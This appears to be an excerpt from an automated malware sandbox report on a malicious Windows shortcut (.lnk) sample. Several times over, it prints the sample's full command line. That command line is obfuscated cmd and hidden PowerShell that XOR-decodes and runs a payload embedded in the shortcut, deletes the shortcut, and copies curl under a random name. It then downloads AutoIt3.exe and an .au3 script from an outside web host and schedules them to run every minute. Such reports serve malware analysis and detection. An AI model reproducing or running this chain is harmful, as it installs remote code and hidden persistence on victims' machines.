    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /sc minute /mo 1 /tn "QwbpjvdmTA" /tr "c:\GSlLzFnTov\AutoIt3.exe c:\GSlLzFnTov\QwbpjvdmTA.au3"Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sLkrGsZRCfGabaMfKpxFsSpWKAhNPssJmxQAcjvWqTWLATHZCqoATzGzvpHekkckNXPBjjczUAozVEuRUijweRQLSofNBqLfRLXEeePsnNHrmfESURkbbEfWgcLVepXBQiKiGQMPtRiqhxyLJoTMfJdkFbwbsToYRfAcvvjedvHjuQNHCakQwkvfexCFsKuzAkzcXvpndNHJbTQQnPxsGyzEJuYXSEMtbgHipKLgLYLJBMekHNsCkbUcLVtBxrvyboHVkGzBdrHJNRcWpModkhhZnExuqhJsAmGodjabnQyUtjpUSwmLcsnTfJGFifkVHphAiPSfLnRvJoFdoCBTWXpiYPhuBuTgECkdcPLdEfZQASjSdCqFCrZKZYBuGwCquJSecAazSxoQXzGfCprYdmCmEzedkpwhAJtSaeQ00001DA5xqwRqfFmhfEzAvXoBbfnogPfxyQunyxhuNGMPxfcWvkMuEofFAjcYWxrBrsSqjZJHwfNQjydVdrTVcKUkJQMoujxpojwfoMLwBeYyAqubggUEEvyGyGGumtmnGwzacYGrFvsYMuKsuKhnpUKTLRGHeqjhSKSdQtZhzBZidzVdXnaBmYYNNHpmrZmomjgbBFCaLZNMVAQjVBLRqGWTMdpheNRzqKXTtTzqKaSmkkTkTeqPouYEonoypuVXimvkCWQbbufpQJHzjepZvbmVLsEgEbapeUdYQHGWpoNUoJPFEPokeWzgZzzkqJwatRkVEJLBwsKhosFcCZBQMPjhtXYphvEFSNyxwTaVcMPMksSGUwHrgGnFGcAHKutaNdpAThEKYGNaZxWaeruKNnyjzTStrrkGrNYhdpPLTXszUmGhfABsaKmzEebZqksGvfJkyPXPBJSRUZqnmJnQQSGGzwCYoPuGEMePCuJrENQqTvGEPNNHXBRCxbKckZzPojmgVAKRaWkbbpPeRYizaNJbWzqALFfEnbcHjyKmdWGbrQAhnFknQaNzzjktkiftQFPanfUqnXwefHKgYhoetTQnnAhZopaVQnmLaAVgLVZ||goto&po^w^e^rs^he^l^l -windowstyle hidden function JogMjclRPK(){$zPedYniBfy=Get-ChildItem *.lnk;$zPedYniBfy=$zPedYniBfy^|where-object{$_.length -eq 0x0002233E};$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy^|Select-Object -ExpandProperty Name;if($zPedYniBfy.length -eq 0){cd $env:TEMP;$zPedYniBfy=Get-ChildItem *.lnk;$zPedYniBfy=$zPedYniBfy^|where-object {$_.length -eq 0x0002233E} ;$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy^|Select-Object -ExpandProperty Name;}return @($zPedYniBfy, $nJlRQzeAUMCXVjArUNw)};function pXufClQZMa(){$djLutZCNrS=JogMjclRPK;$zPedYniBfy=$djLutZCNrS[0];$zPedYniBfy=$zPedYniBfy.substring(0,$zPedYniBfy.length-4);return $zPedYniBfy};function vzGyLDmQaW{$djLutZCNrS=pXufClQZMa;$rqZWEoTXlI=JogMjclRPK;$zPedYniBfy=$rqZWEoTXlI[0];$CvytSiJOHD=[System.IO.BinaryReader]::new([System.IO.File]::open($zPedYniBfy,[System.IO.FileMode]::Open,[System.IO.FileAccess]::ReadWrite,[System.IO.FileShare]::None));try{$CvytSiJOHD.BaseStream.Seek(0x00001DA5,[System.IO.SeekOrigin]::Begin);$fKLtldjopW=$CvytSiJOHD.ReadBytes(0x00006C00);}finally{$CvytSiJOHD.Close()};for($nJlRQzeAUM=0; $nJlRQzeAUM -lt $fKLtldjopW.count; $nJlRQzeAUM++) { $fKLtldjopW[$nJlRQzeAUM]=$fKLtldjopW[$nJlRQzeAUM] -bxor 0xD8 };[System.IO.File]::WriteAllBytes($djLutZCNrS,$fKLtldjopW);$oEefgawPUH='.\'+$djLutZCNrS;^& $oEefgawPUH;return 'WbpvmJeASc'};$oEefgawPUH=vzGyLDmQaW;$WrKnPBwfdh=JogMjclRPK;remove-item -path $WrKnPBwfdh[1] -force;&mkdir c:\GSlLzFnTov & attrib +h c:\GSlLzFnTov & cd /d c:\GSlLzFnTov & copy c:\windows\system32\curl.exe GSlLzFnTov.exe & GSlLzFnTov -k -o AutoIt3.exe https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago^&za=honey0 & GSlLzFnTov -k -o QwbpjvdmTA.au3 https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago^&za=honey1 & sc^htas^ks /create /sc minute /mo 1 /tn "QwbpjvdmTA" /tr "c:\GSlLzFnTov\AutoIt3.exe c:\GSlLzFnTov\QwbpjvdmTA.au3"Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden function JogMjclRPK(){$zPedYniBfy=Get-ChildItem *.lnk;$zPedYniBfy=$zPedYniBfy|where-object{$_.length -eq 0x0002233E};$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy|Select-Object -ExpandProperty Name;if($zPedYniBfy.length -eq 0){cd $env:TEMP;$zPedYniBfy=Get-ChildItem *.lnk;$zPedYniBfy=$zPedYniBfy|where-object {$_.length -eq 0x0002233E} ;$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy|Select-Object -ExpandProperty Name;}return @($zPedYniBfy, $nJlRQzeAUMCXVjArUNw)};function pXufClQZMa(){$djLutZCNrS=JogMjclRPK;$zPedYniBfy=$djLutZCNrS[0];$zPedYniBfy=$zPedYniBfy.substring(0,$zPedYniBfy.length-4);return $zPedYniBfy};function vzGyLDmQaW{$djLutZCNrS=pXufClQZMa;$rqZWEoTXlI=JogMjclRPK;$zPedYniBfy=$rqZWEoTXlI[0];$CvytSiJOHD=[System.IO.BinaryReader]::new([System.IO.File]::open($zPedYniBfy,[System.IO.FileMode]::Open,[System.IO.FileAccess]::ReadWrite,[System.IO.FileShare]::None));try{$CvytSiJOHD.BaseStream.Seek(0x00001DA5,[System.IO.SeekOrigin]::Begin);$fKLtldjopW=$CvytSiJOHD.ReadBytes(0x00006C00);}finally{$CvytSiJOHD.Close()};for($nJlRQzeAUM=0; $nJlRQzeAUM -lt $fKLtldjopW.count; $nJlRQzeAUM++) { $fKLtldjopW[$nJlRQzeAUM]=$fKLtldjopW[$nJlRQzeAUM] -bxor 0xD8 };[System.IO.File]::WriteAllBytes($djLutZCNrS,$fKLtldjopW);$oEefgawPUH='.\'+$djLutZCNrS;& $oEefgawPUH;return 'WbpvmJeASc'};$oEefgawPUH=vzGyLDmQaW;$WrKnPBwfdh=JogMjclRPK;remove-item -path $WrKnPBwfdh[1] -force;
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +h c:\GSlLzFnTov
    Source: C:\Windows\System32\cmd.exeProcess created: C:\GSlLzFnTov\GSlLzFnTov.exe GSlLzFnTov -k -o AutoIt3.exe https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago&za=honey0
    Source: C:\Windows\System32\cmd.exeProcess created: C:\GSlLzFnTov\GSlLzFnTov.exe GSlLzFnTov -k -o QwbpjvdmTA.au3 https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago&za=honey1
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /sc minute /mo 1 /tn "QwbpjvdmTA" /tr "c:\GSlLzFnTov\AutoIt3.exe c:\GSlLzFnTov\QwbpjvdmTA.au3"
    Source: unknownProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c slkrgszrcfgabamfkpxfsspwkahnpssjmxqacjvwqtwlathzcqoatzgzvphekkcknxpbjjczuaozveuruijwerqlsofnbqlfrlxeeepsnnhrmfesurkbbefwgclvepxbqikigqmptriqhxyljotmfjdkfbwbstoyrfacvvjedvhjuqnhcakqwkvfexcfskuzakzcxvpndnhjbtqqnpxsgyzejuyxsemtbghipklglyljbmekhnsckbuclvtbxrvybohvkgzbdrhjnrcwpmodkhhznexuqhjsamgodjabnqyutjpuswmlcsntfjgfifkvhphaipsflnrvjofdocbtwxpiyphubutgeckdcpldefzqasjsdcqfcrzkzybugwcqujsecaazsxoqxzgfcprydmcmezedkpwhajtsaeq00001da5xqwrqffmhfezavxobbfnogpfxyqunyxhungmpxfcwvkmueoffajcywxrbrssqjzjhwfnqjydvdrtvckukjqmoujxpojwfomlwbeyyaqubggueevygyggumtmngwzacygrfvsymuksukhnpuktlrgheqjhsksdqtzhzbzidzvdxnabmyynnhpmrzmomjgbbfcalznmvaqjvblrqgwtmdphenrzqkxtttzqkasmkktkteqpouyeonoypuvximvkcwqbbufpqjhzjepzvbmvlsegebapeudyqhgwponuojpfepokewzgzzzkqjwatrkvejlbwskhosfcczbqmpjhtxyphvefsnyxwtavcmpmkssguwhrggnfgcahkutandpathekygnazxwaeruknnyjztstrrkgrnyhdppltxszumghfabsakmzeebzqksgvfjkypxpbjsruzqnmjnqqsggzwcyopugemepcujrenqqtvgepnnhxbrcxbkckzzpojmgvakrawkbbpperyizanjbwzqalffenbchjykmdwgbrqahnfknqanzzjktkiftqfpanfuqnxwefhkgyhoettqnnahzopavqnmlaavglvz||goto&po^w^e^rs^he^l^l -windowstyle hidden function jogmjclrpk(){$zpedynibfy=get-childitem *.lnk;$zpedynibfy=$zpedynibfy^|where-object{$_.length -eq 0x0002233e};$njlrqzeaumcxvjarunw=$zpedynibfy;$zpedynibfy=$zpedynibfy^|select-object -expandproperty name;if($zpedynibfy.length -eq 0){cd $env:temp;$zpedynibfy=get-childitem *.lnk;$zpedynibfy=$zpedynibfy^|where-object {$_.length -eq 0x0002233e} ;$njlrqzeaumcxvjarunw=$zpedynibfy;$zpedynibfy=$zpedynibfy^|select-object -expandproperty name;}return @($zpedynibfy, $njlrqzeaumcxvjarunw)};function pxufclqzma(){$djlutzcnrs=jogmjclrpk;$zpedynibfy=$djlutzcnrs[0];$zpedynibfy=$zpedynibfy.substring(0,$zpedynibfy.length-4);return $zpedynibfy};function vzgyldmqaw{$djlutzcnrs=pxufclqzma;$rqzweotxli=jogmjclrpk;$zpedynibfy=$rqzweotxli[0];$cvytsijohd=[system.io.binaryreader]::new([system.io.file]::open($zpedynibfy,[system.io.filemode]::open,[system.io.fileaccess]::readwrite,[system.io.fileshare]::none));try{$cvytsijohd.basestream.seek(0x00001da5,[system.io.seekorigin]::begin);$fkltldjopw=$cvytsijohd.readbytes(0x00006c00);}finally{$cvytsijohd.close()};for($njlrqzeaum=0; $njlrqzeaum -lt $fkltldjopw.count; $njlrqzeaum++) { $fkltldjopw[$njlrqzeaum]=$fkltldjopw[$njlrqzeaum] -bxor 0xd8 };[system.io.file]::writeallbytes($djlutzcnrs,$fkltldjopw);$oeefgawpuh='.\'+$djlutzcnrs;^& $oeefgawpuh;return 'wbpvmjeasc'};$oeefgawpuh=vzgyldmqaw;$wrknpbwfdh=jogmjclrpk;remove-item -path $wrknpbwfdh[1] -force;&mkdir c:\gsllzfntov & attrib +h c:\gsllzfntov & cd /d c:\gsllzfntov & copy c:\windows\system32\curl.exe gsllzfntov.exe & gsllzfntov -k -o autoit3.exe https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago^&za=honey0 & gsllzfntov -k -o qwbpjvdmta.au3 https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago^&za=honey1 & sc^htas^ks /create /sc minute /mo 1 /tn "qwbpjvdmta" /tr "c:\gsllzfntov\autoit3.exe c:\gsllzfntov\qwbpjvdmta.au3"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden function jogmjclrpk(){$zpedynibfy=get-childitem *.lnk;$zpedynibfy=$zpedynibfy|where-object{$_.length -eq 0x0002233e};$njlrqzeaumcxvjarunw=$zpedynibfy;$zpedynibfy=$zpedynibfy|select-object -expandproperty name;if($zpedynibfy.length -eq 0){cd $env:temp;$zpedynibfy=get-childitem *.lnk;$zpedynibfy=$zpedynibfy|where-object {$_.length -eq 0x0002233e} ;$njlrqzeaumcxvjarunw=$zpedynibfy;$zpedynibfy=$zpedynibfy|select-object -expandproperty name;}return @($zpedynibfy, $njlrqzeaumcxvjarunw)};function pxufclqzma(){$djlutzcnrs=jogmjclrpk;$zpedynibfy=$djlutzcnrs[0];$zpedynibfy=$zpedynibfy.substring(0,$zpedynibfy.length-4);return $zpedynibfy};function vzgyldmqaw{$djlutzcnrs=pxufclqzma;$rqzweotxli=jogmjclrpk;$zpedynibfy=$rqzweotxli[0];$cvytsijohd=[system.io.binaryreader]::new([system.io.file]::open($zpedynibfy,[system.io.filemode]::open,[system.io.fileaccess]::readwrite,[system.io.fileshare]::none));try{$cvytsijohd.basestream.seek(0x00001da5,[system.io.seekorigin]::begin);$fkltldjopw=$cvytsijohd.readbytes(0x00006c00);}finally{$cvytsijohd.close()};for($njlrqzeaum=0; $njlrqzeaum -lt $fkltldjopw.count; $njlrqzeaum++) { $fkltldjopw[$njlrqzeaum]=$fkltldjopw[$njlrqzeaum] -bxor 0xd8 };[system.io.file]::writeallbytes($djlutzcnrs,$fkltldjopw);$oeefgawpuh='.\'+$djlutzcnrs;& $oeefgawpuh;return 'wbpvmjeasc'};$oeefgawpuh=vzgyldmqaw;$wrknpbwfdh=jogmjclrpk;remove-item -path $wrknpbwfdh[1] -force;
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c slkrgszrcfgabamfkpxfsspwkahnpssjmxqacjvwqtwlathzcqoatzgzvphekkcknxpbjjczuaozveuruijwerqlsofnbqlfrlxeeepsnnhrmfesurkbbefwgclvepxbqikigqmptriqhxyljotmfjdkfbwbstoyrfacvvjedvhjuqnhcakqwkvfexcfskuzakzcxvpndnhjbtqqnpxsgyzejuyxsemtbghipklglyljbmekhnsckbuclvtbxrvybohvkgzbdrhjnrcwpmodkhhznexuqhjsamgodjabnqyutjpuswmlcsntfjgfifkvhphaipsflnrvjofdocbtwxpiyphubutgeckdcpldefzqasjsdcqfcrzkzybugwcqujsecaazsxoqxzgfcprydmcmezedkpwhajtsaeq00001da5xqwrqffmhfezavxobbfnogpfxyqunyxhungmpxfcwvkmueoffajcywxrbrssqjzjhwfnqjydvdrtvckukjqmoujxpojwfomlwbeyyaqubggueevygyggumtmngwzacygrfvsymuksukhnpuktlrgheqjhsksdqtzhzbzidzvdxnabmyynnhpmrzmomjgbbfcalznmvaqjvblrqgwtmdphenrzqkxtttzqkasmkktkteqpouyeonoypuvximvkcwqbbufpqjhzjepzvbmvlsegebapeudyqhgwponuojpfepokewzgzzzkqjwatrkvejlbwskhosfcczbqmpjhtxyphvefsnyxwtavcmpmkssguwhrggnfgcahkutandpathekygnazxwaeruknnyjztstrrkgrnyhdppltxszumghfabsakmzeebzqksgvfjkypxpbjsruzqnmjnqqsggzwcyopugemepcujrenqqtvgepnnhxbrcxbkckzzpojmgvakrawkbbpperyizanjbwzqalffenbchjykmdwgbrqahnfknqanzzjktkiftqfpanfuqnxwefhkgyhoettqnnahzopavqnmlaavglvz||goto&po^w^e^rs^he^l^l -windowstyle hidden function jogmjclrpk(){$zpedynibfy=get-childitem *.lnk;$zpedynibfy=$zpedynibfy^|where-object{$_.length -eq 0x0002233e};$njlrqzeaumcxvjarunw=$zpedynibfy;$zpedynibfy=$zpedynibfy^|select-object -expandproperty name;if($zpedynibfy.length -eq 0){cd $env:temp;$zpedynibfy=get-childitem *.lnk;$zpedynibfy=$zpedynibfy^|where-object {$_.length -eq 0x0002233e} ;$njlrqzeaumcxvjarunw=$zpedynibfy;$zpedynibfy=$zpedynibfy^|select-object -expandproperty name;}return @($zpedynibfy, $njlrqzeaumcxvjarunw)};function pxufclqzma(){$djlutzcnrs=jogmjclrpk;$zpedynibfy=$djlutzcnrs[0];$zpedynibfy=$zpedynibfy.substring(0,$zpedynibfy.length-4);return $zpedynibfy};function vzgyldmqaw{$djlutzcnrs=pxufclqzma;$rqzweotxli=jogmjclrpk;$zpedynibfy=$rqzweotxli[0];$cvytsijohd=[system.io.binaryreader]::new([system.io.file]::open($zpedynibfy,[system.io.filemode]::open,[system.io.fileaccess]::readwrite,[system.io.fileshare]::none));try{$cvytsijohd.basestream.seek(0x00001da5,[system.io.seekorigin]::begin);$fkltldjopw=$cvytsijohd.readbytes(0x00006c00);}finally{$cvytsijohd.close()};for($njlrqzeaum=0; $njlrqzeaum -lt $fkltldjopw.count; $njlrqzeaum++) { $fkltldjopw[$njlrqzeaum]=$fkltldjopw[$njlrqzeaum] -bxor 0xd8 };[system.io.file]::writeallbytes($djlutzcnrs,$fkltldjopw);$oeefgawpuh='.\'+$djlutzcnrs;^& $oeefgawpuh;return 'wbpvmjeasc'};$oeefgawpuh=vzgyldmqaw;$wrknpbwfdh=jogmjclrpk;remove-item -path $wrknpbwfdh[1] -force;&mkdir c:\gsllzfntov & attrib +h c:\gsllzfntov & cd /d c:\gsllzfntov & copy c:\windows\system32\curl.exe gsllzfntov.exe & gsllzfntov -k -o autoit3.exe https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago^&za=honey0 & gsllzfntov -k -o qwbpjvdmta.au3 https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago^&za=honey1 & sc^htas^ks /create /sc minute /mo 1 /tn "qwbpjvdmta" /tr "c:\gsllzfntov\autoit3.exe c:\gsllzfntov\qwbpjvdmta.au3"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden function jogmjclrpk(){$zpedynibfy=get-childitem *.lnk;$zpedynibfy=$zpedynibfy|where-object{$_.length -eq 0x0002233e};$njlrqzeaumcxvjarunw=$zpedynibfy;$zpedynibfy=$zpedynibfy|select-object -expandproperty name;if($zpedynibfy.length -eq 0){cd $env:temp;$zpedynibfy=get-childitem *.lnk;$zpedynibfy=$zpedynibfy|where-object {$_.length -eq 0x0002233e} ;$njlrqzeaumcxvjarunw=$zpedynibfy;$zpedynibfy=$zpedynibfy|select-object -expandproperty name;}return @($zpedynibfy, $njlrqzeaumcxvjarunw)};function pxufclqzma(){$djlutzcnrs=jogmjclrpk;$zpedynibfy=$djlutzcnrs[0];$zpedynibfy=$zpedynibfy.substring(0,$zpedynibfy.length-4);return $zpedynibfy};function vzgyldmqaw{$djlutzcnrs=pxufclqzma;$rqzweotxli=jogmjclrpk;$zpedynibfy=$rqzweotxli[0];$cvytsijohd=[system.io.binaryreader]::new([system.io.file]::open($zpedynibfy,[system.io.filemode]::open,[system.io.fileaccess]::readwrite,[system.io.fileshare]::none));try{$cvytsijohd.basestream.seek(0x00001da5,[system.io.seekorigin]::begin);$fkltldjopw=$cvytsijohd.readbytes(0x00006c00);}finally{$cvytsijohd.close()};for($njlrqzeaum=0; $njlrqzeaum -lt $fkltldjopw.count; $njlrqzeaum++) { $fkltldjopw[$njlrqzeaum]=$fkltldjopw[$njlrqzeaum] -bxor 0xd8 };[system.io.file]::writeallbytes($djlutzcnrs,$fkltldjopw);$oeefgawpuh='.\'+$djlutzcnrs;& $oeefgawpuh;return 'wbpvmjeasc'};$oeefgawpuh=vzgyldmqaw;$wrknpbwfdh=jogmjclrpk;remove-item -path $wrknpbwfdh[1] -force;
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden function jogmjclrpk(){$zpedynibfy=get-childitem *.lnk;$zpedynibfy=$zpedynibfy|where-object{$_.length -eq 0x0002233e};$njlrqzeaumcxvjarunw=$zpedynibfy;$zpedynibfy=$zpedynibfy|select-object -expandproperty name;if($zpedynibfy.length -eq 0){cd $env:temp;$zpedynibfy=get-childitem *.lnk;$zpedynibfy=$zpedynibfy|where-object {$_.length -eq 0x0002233e} ;$njlrqzeaumcxvjarunw=$zpedynibfy;$zpedynibfy=$zpedynibfy|select-object -expandproperty name;}return @($zpedynibfy, $njlrqzeaumcxvjarunw)};function pxufclqzma(){$djlutzcnrs=jogmjclrpk;$zpedynibfy=$djlutzcnrs[0];$zpedynibfy=$zpedynibfy.substring(0,$zpedynibfy.length-4);return $zpedynibfy};function vzgyldmqaw{$djlutzcnrs=pxufclqzma;$rqzweotxli=jogmjclrpk;$zpedynibfy=$rqzweotxli[0];$cvytsijohd=[system.io.binaryreader]::new([system.io.file]::open($zpedynibfy,[system.io.filemode]::open,[system.io.fileaccess]::readwrite,[system.io.fileshare]::none));try{$cvytsijohd.basestream.seek(0x00001da5,[system.io.seekorigin]::begin);$fkltldjopw=$cvytsijohd.readbytes(0x00006c00);}finally{$cvytsijohd.close()};for($njlrqzeaum=0; $njlrqzeaum -lt $fkltldjopw.count; $njlrqzeaum++) { $fkltldjopw[$njlrqzeaum]=$fkltldjopw[$njlrqzeaum] -bxor 0xd8 };[system.io.file]::writeallbytes($djlutzcnrs,$fkltldjopw);$oeefgawpuh='.\'+$djlutzcnrs;& $oeefgawpuh;return 'wbpvmjeasc'};$oeefgawpuh=vzgyldmqaw;$wrknpbwfdh=jogmjclrpk;remove-item -path $wrknpbwfdh[1] -force;Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c slkrgszrcfgabamfkpxfsspwkahnpssjmxqacjvwqtwlathzcqoatzgzvphekkcknxpbjjczuaozveuruijwerqlsofnbqlfrlxeeepsnnhrmfesurkbbefwgclvepxbqikigqmptriqhxyljotmfjdkfbwbstoyrfacvvjedvhjuqnhcakqwkvfexcfskuzakzcxvpndnhjbtqqnpxsgyzejuyxsemtbghipklglyljbmekhnsckbuclvtbxrvybohvkgzbdrhjnrcwpmodkhhznexuqhjsamgodjabnqyutjpuswmlcsntfjgfifkvhphaipsflnrvjofdocbtwxpiyphubutgeckdcpldefzqasjsdcqfcrzkzybugwcqujsecaazsxoqxzgfcprydmcmezedkpwhajtsaeq00001da5xqwrqffmhfezavxobbfnogpfxyqunyxhungmpxfcwvkmueoffajcywxrbrssqjzjhwfnqjydvdrtvckukjqmoujxpojwfomlwbeyyaqubggueevygyggumtmngwzacygrfvsymuksukhnpuktlrgheqjhsksdqtzhzbzidzvdxnabmyynnhpmrzmomjgbbfcalznmvaqjvblrqgwtmdphenrzqkxtttzqkasmkktkteqpouyeonoypuvximvkcwqbbufpqjhzjepzvbmvlsegebapeudyqhgwponuojpfepokewzgzzzkqjwatrkvejlbwskhosfcczbqmpjhtxyphvefsnyxwtavcmpmkssguwhrggnfgcahkutandpathekygnazxwaeruknnyjztstrrkgrnyhdppltxszumghfabsakmzeebzqksgvfjkypxpbjsruzqnmjnqqsggzwcyopugemepcujrenqqtvgepnnhxbrcxbkckzzpojmgvakrawkbbpperyizanjbwzqalffenbchjykmdwgbrqahnfknqanzzjktkiftqfpanfuqnxwefhkgyhoettqnnahzopavqnmlaavglvz||goto&po^w^e^rs^he^l^l -windowstyle hidden function jogmjclrpk(){$zpedynibfy=get-childitem *.lnk;$zpedynibfy=$zpedynibfy^|where-object{$_.length -eq 0x0002233e};$njlrqzeaumcxvjarunw=$zpedynibfy;$zpedynibfy=$zpedynibfy^|select-object -expandproperty name;if($zpedynibfy.length -eq 0){cd $env:temp;$zpedynibfy=get-childitem *.lnk;$zpedynibfy=$zpedynibfy^|where-object {$_.length -eq 0x0002233e} ;$njlrqzeaumcxvjarunw=$zpedynibfy;$zpedynibfy=$zpedynibfy^|select-object -expandproperty name;}return @($zpedynibfy, $njlrqzeaumcxvjarunw)};function pxufclqzma(){$djlutzcnrs=jogmjclrpk;$zpedynibfy=$djlutzcnrs[0];$zpedynibfy=$zpedynibfy.substring(0,$zpedynibfy.length-4);return $zpedynibfy};function vzgyldmqaw{$djlutzcnrs=pxufclqzma;$rqzweotxli=jogmjclrpk;$zpedynibfy=$rqzweotxli[0];$cvytsijohd=[system.io.binaryreader]::new([system.io.file]::open($zpedynibfy,[system.io.filemode]::open,[system.io.fileaccess]::readwrite,[system.io.fileshare]::none));try{$cvytsijohd.basestream.seek(0x00001da5,[system.io.seekorigin]::begin);$fkltldjopw=$cvytsijohd.readbytes(0x00006c00);}finally{$cvytsijohd.close()};for($njlrqzeaum=0; $njlrqzeaum -lt $fkltldjopw.count; $njlrqzeaum++) { $fkltldjopw[$njlrqzeaum]=$fkltldjopw[$njlrqzeaum] -bxor 0xd8 };[system.io.file]::writeallbytes($djlutzcnrs,$fkltldjopw);$oeefgawpuh='.\'+$djlutzcnrs;^& $oeefgawpuh;return 'wbpvmjeasc'};$oeefgawpuh=vzgyldmqaw;$wrknpbwfdh=jogmjclrpk;remove-item -path $wrknpbwfdh[1] -force;&mkdir c:\gsllzfntov & attrib +h c:\gsllzfntov & cd /d c:\gsllzfntov & copy c:\windows\system32\curl.exe gsllzfntov.exe & gsllzfntov -k -o autoit3.exe https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago^&za=honey0 & gsllzfntov -k -o qwbpjvdmta.au3 https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago^&za=honey1 & sc^htas^ks /create /sc minute /mo 1 /tn "qwbpjvdmta" /tr "c:\gsllzfntov\autoit3.exe c:\gsllzfntov\qwbpjvdmta.au3"Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden function jogmjclrpk(){$zpedynibfy=get-childitem *.lnk;$zpedynibfy=$zpedynibfy|where-object{$_.length -eq 0x0002233e};$njlrqzeaumcxvjarunw=$zpedynibfy;$zpedynibfy=$zpedynibfy|select-object -expandproperty name;if($zpedynibfy.length -eq 0){cd $env:temp;$zpedynibfy=get-childitem *.lnk;$zpedynibfy=$zpedynibfy|where-object {$_.length -eq 0x0002233e} ;$njlrqzeaumcxvjarunw=$zpedynibfy;$zpedynibfy=$zpedynibfy|select-object -expandproperty name;}return @($zpedynibfy, $njlrqzeaumcxvjarunw)};function pxufclqzma(){$djlutzcnrs=jogmjclrpk;$zpedynibfy=$djlutzcnrs[0];$zpedynibfy=$zpedynibfy.substring(0,$zpedynibfy.length-4);return $zpedynibfy};function vzgyldmqaw{$djlutzcnrs=pxufclqzma;$rqzweotxli=jogmjclrpk;$zpedynibfy=$rqzweotxli[0];$cvytsijohd=[system.io.binaryreader]::new([system.io.file]::open($zpedynibfy,[system.io.filemode]::open,[system.io.fileaccess]::readwrite,[system.io.fileshare]::none));try{$cvytsijohd.basestream.seek(0x00001da5,[system.io.seekorigin]::begin);$fkltldjopw=$cvytsijohd.readbytes(0x00006c00);}finally{$cvytsijohd.close()};for($njlrqzeaum=0; $njlrqzeaum -lt $fkltldjopw.count; $njlrqzeaum++) { $fkltldjopw[$njlrqzeaum]=$fkltldjopw[$njlrqzeaum] -bxor 0xd8 };[system.io.file]::writeallbytes($djlutzcnrs,$fkltldjopw);$oeefgawpuh='.\'+$djlutzcnrs;& $oeefgawpuh;return 'wbpvmjeasc'};$oeefgawpuh=vzgyldmqaw;$wrknpbwfdh=jogmjclrpk;remove-item -path $wrknpbwfdh[1] -force;

    Language, Device and Operating System Detection

    barindex
    Source: Yara matchFile source: knfV5IVjEV.lnk, type: SAMPLE
    Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
